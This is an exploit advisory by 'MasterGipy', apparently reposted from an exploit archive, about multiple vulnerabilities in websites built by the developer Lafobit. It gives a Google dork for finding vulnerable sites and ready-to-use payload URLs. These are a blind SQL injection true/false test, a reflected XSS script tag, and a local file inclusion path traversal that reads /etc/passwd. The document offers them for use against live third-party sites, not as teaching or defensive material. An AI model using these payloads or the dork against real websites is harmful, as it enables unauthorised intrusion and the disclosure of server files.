Lafobit Webpages Mullti Vulnerability

=====================================
Lafobit Webpages Mullti Vulnerability
=====================================

      ______                _       _   _             
      | ___ \              | |     | | (_)            
      | |_/ /_____   _____ | |_   _| |_ _  ___  _ __  
      |    // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \   
      | |\ \  __/\ V / (_) | | |_| | |_| | (_) | | | |   
      \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| 

        _____                      _____  _____ 
       |_   _|                    |  _  ||  _  |
         | | ___  __ _ _ __ ___   | |/' || |_| |
         | |/ _ \/ _` | '_ ` _ \  |  /| |\____ |
         | |  __/ (_| | | | | | | \ |_/ /.___/ /
         \_/\___|\__,_|_| |_| |_|  \___/ \____/

_____________________________________________________________
   
[$] Exploit Title     : Lafobit Webpages Mullti Vulnerability 
[$] Date              : 08-04-2010            
[$] Author            : MasterGipy
[$] Email             : [email protected]
[$] Web Site          : http://www.lafobit.com
[$] Vulnerable Pages  : All pages that were created by this company are vulnerable.
[$] Bug               : Multi
[$] Google Dork       : "Desenvolvido por Lafobit"

[$] Code :


_-_-_-_-_-_-_-_-_[Blind SQL Injection]_-_-_-_-_-_-_-_-_



http://example.pt/?modulo=conteudos&link=arquivo' and+1-1=1+--+   <- False
http://example.pt/?modulo=conteudos&link=arquivo' and+1-1=0+--+   <- True


_-_-_-_-_-_-_-_-_[XSS]_-_-_-_-_-_-_-_-_


http://example.pt/modulos/downloads/download.php?id=<script>alert(/XSS/)</script>


_-_-_-_-_-_-_-_-_[LFI]_-_-_-_-_-_-_-_-_

http://example.pt/?modulo=erro../../../../../../../../../../etc/passwd%00



#  0day.today [2018-04-04]  #